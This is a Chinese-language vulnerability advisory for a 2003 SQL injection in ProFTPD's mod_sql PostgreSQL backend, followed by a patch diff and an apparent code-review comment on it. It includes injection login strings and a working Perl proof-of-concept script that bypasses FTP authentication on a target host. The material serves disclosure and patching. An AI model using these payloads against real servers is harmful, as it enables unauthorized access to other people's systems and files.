ProFTPD SQL注入mod_sql漏洞 发布时间:2003-06-19 更新时间:2003-06-25 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:7974 受影响系统 ProFTPD Project ProFTPD 1.2 pre9 详细描述 ProFTPD存在SQL注入漏洞。 如果ProFTPD使用mod_sql模块进行PostgreSQL数据库操作,由于对用户提供的用户名和密码数据缺少充分过滤,提交恶意SQL命令可绕过验证,直接访问FTP服务器。 测试代码 Name (localhost:runlevel): ')UNION SELECT 'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''=' 331 Password required for ')UNION. Password: 230 User ')UNION SELECT 'u','p',1001,1001,'/tmp' ,'/bin/bash' WHERE(''=' logged in. ----------------------------------------------------------------- #!/usr/bin/perl # Sql inject on ProFTPD with mod_sql proof of concept script # runlevel [ runlevel@raregazz.org ] # Spain, 2003 use IO::Socket; if(@ARGC<2){ print "\nProof Of Concept Sql Inject on ProFTPD\n"; print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n"; exit(0); }; $server = $ARGV[0]; $query = $ARGV[1]; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) or die "Can't connect. \n"; if(defined($line=<$remote>)){ print STDOUT $line; } # Proof of concept query, it may change on the number of rows # By default, it can query User, Pass, Uid, Gid, Shell or # User, Pass, Uid, Gid, Shell, Path, change the union query... 
if($query eq "1"){ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n"; }else{ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n"; }; if(defined($line=<$remote>)){ print STDOUT $line; } print $remote "PASS p\n"; if(defined($line=<$remote>)){ print STDOUT $line; } print "Sent query to $ARGV[0]\n"; if($line =~ /230/){ #logged in print "[------- Sql Inject Able \n"; }else{ print "[------- Sql Inject Unable \n"; } close $remote; 解决方案 相关补丁如下,此补丁需要PostgreSQL高于7.2版本: Index: contrib/mod_sql_postgres.c =================================================================== RCS file: /cvsroot/proftp/proftpd/contrib/mod_sql_postgres.c,v retrieving revision 1.15 diff -u -r1.15 mod_sql_postgres.c --- contrib/mod_sql_postgres.c 29 May 2003 07:29:43 -0000 1.15 +++ contrib/mod_sql_postgres.c 17 Jun 2003 20:52:30 -0000 @@ -1105,23 +1105,13 @@ conn = (db_conn_t *) entry->data; /* Note: the PQescapeString() function appeared in the C API as of - * Postgres-7.2; this macro allows for functioning with older postgres - * installations. Unfortunately, Postgres' PG_VERSION is defined as - * a string, not an actual number, which makes for preprocessor-time checking - * of that value much harder. - * - * Ideally, this function could be detected by a configure script, but - * ProFTPD does not yet support per-module configure scripts. + * Postgres-7.2. */ -#ifndef POSTGRES_NO_PQESCAPESTRING unescaped = cmd->argv[1]; escaped = (char *) pcalloc(cmd->tmp_pool, sizeof(char) * (strlen(unescaped) * 2) + 1); PQescapeString(escaped, unescaped, strlen(unescaped)); -#else - escaped = cmd->argv[1]; -#endif sql_log(DEBUG_FUNC, "%s", "exiting \tpostgres cmd_escapestring"); return mod_create_data(cmd, (void *) escaped); 相关信息 参考:http://www.securityfocus.com/bid/7974 http://www.securityfocus.com/advisories/5517 |
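Review bot: The retained escaping path in the mod_sql_postgres.c hunk calls `strlen(unescaped)` twice and discards the length PQescapeString() returns, which makes it harder to see that the 2n+1 buffer is the intended size; hoist it into a local, `size_t len = strlen(unescaped); escaped = pcalloc(cmd->tmp_pool, (len * 2) + 1); PQescapeString(escaped, unescaped, len);`. PQescapeString() takes no connection handle, so it escapes without knowing the session's client encoding; the fix is sound for single-byte encodings, and when the module is built against a libpq that provides PQescapeStringConn() (which also reports an error flag) that variant should be preferred. The surviving comment now only states when PQescapeString() appeared, while the removed #ifndef fallback that returned argv[1] unescaped was the vulnerable path, so say so explicitly, e.g. `/* PQescapeString() appeared in libpq with PostgreSQL 7.2; this module now requires at least that version instead of falling back to the unescaped string. */`. The enclosing function (cmd_escapestring, judging by the sql_log message) starts outside the hunk, so whether cmd->argv[1] can be NULL here is not visible; if it can, the strlen() call needs a guard.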